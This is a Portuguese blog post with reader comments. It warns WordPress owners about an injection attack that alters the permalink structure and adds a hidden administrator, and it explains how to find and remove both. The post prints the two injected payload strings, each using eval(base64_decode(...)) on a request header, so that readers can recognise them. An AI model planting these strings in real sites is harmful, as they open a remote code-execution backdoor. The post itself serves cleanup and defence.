Muitos sites estão sendo atingidos por um ataque SQL recente onde códigos estão sendo injetados em seu site. Essa injeção de MySQL afeta seus links permanentes, tornando-os ineficazes. Como resultado, os URLs de suas postagens de blog não funcionarão. Numerosos blogs do WordPress foram alvos neste ataque, Graças a Andy Soward por trazer isso à nossa atenção.
Um dos seguintes códigos foi adicionado à sua estrutura de permalink devido a este ataque:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Essas aspas foram anexadas a todos os permalinks do seu site e só podem ser alteradas se removidas manualmente.
Para corrigir isso, vá para:
Configurações > Links Permanentes e remova o código acima e substitua seu código padrão.
A próxima coisa que você precisa fazer é ir para Usuários. Você verá que há mais de um administrador. Você não verá o nome deles listado, mas verá a contagem aumentada. Então, o que você precisa fazer é olhar todos os usuários e encontrar o último que se registrou. Coloque o mouse sobre esse usuário e obtenha o link. Altere o código userid= adicionando 1 a esse número. Então, se o último usuário que você pode ver era o usuário nº 2, adicione 1 a ele e faça 3. Você deve encontrar o administrador oculto com um código estranho como primeiro nome. Exclua o código e torne-o um assinante. Em seguida, retorne e exclua-o.
Isso deve corrigir o problema. Você também pode excluí-lo simplesmente acessando seu PHPMyAdmin. Porque você verá o usuário lá.
Nós apenas queríamos divulgar esta notícia o mais rápido possível, para que nossos usuários possam ser atualizados. Por favor, certifique-se de que seu blog não está infectado. Esperamos que o WordPress lance uma atualização em breve.
Além disso, se você ainda não implementou algumas dessas medidas para proteger sua Área de Administração do WordPress.
ahmed_alaaedin
O banco de dados do meu site foi injetado há alguns dias, adicionando alguns caracteres e palavras estranhas após cada URL de postagem ou página. Não consegui encontrar nada estranho nas configurações: permalinks ou no menu de usuários. O que fazer para resolver este problema, por favor? Minha empresa de hospedagem tem um backup do banco de dados infectado também!
um usuário do wordpress
fui atingido por isso duas vezes.
da primeira vez foi injeção de sql do plugin wassup, desta vez não tenho certeza. meu provedor de hospedagem me bloqueou.
assim que restaurarem minha conta, vou remover o wordpress.. Chega!
Equipe Editorial
Talvez não seja culpa do WordPress, talvez a segurança da sua hospedagem não seja tão boa...
Admin
Joey
O que você descobriu com isso? Fui atingido com o mesmo problema. Todos os meus sites WP na minha conta estão sofrendo o mesmo problema.
lerrkin
Olá.
URL interessante https://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ vinculado daqui mostra uma página em branco.
O código contém este comentário: ‘‘.
Esse é um bug do WP Super Cache http://wordpress.org/support/topic/315446, e parece estar presente aqui… Então, por favor, atualize o WP Super Cache. Espero que leia essas dicas em breve
Equipe Editorial
Agradecemos muito este comentário, o problema não era com o WP Super Cache, acreditamos que era o plugin chamado WP External Link. Desinstalamos e reinstalamos o WP-Super Cache duas vezes, mas depois comparamos o servidor de desenvolvimento onde tudo funcionava bem. A diferença era este plugin. Quando removemos esse plugin, funcionou. Você pode ler essa postagem agora.
Admin
lerrkin
Talvez tenha sido um conflito entre WP External Link e Super Cache…
O texto era “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
Vejo que meu comentário HTML do WP-Super-Cache colado acima funciona como um comentário HTML e é invisível
Então, a última versão do Super Cache promete não fazer a verificação de validade do HTML.
Ah, estou lendo!
Muito obrigado!
Roseli A. Bakar
Obrigado por destacar isso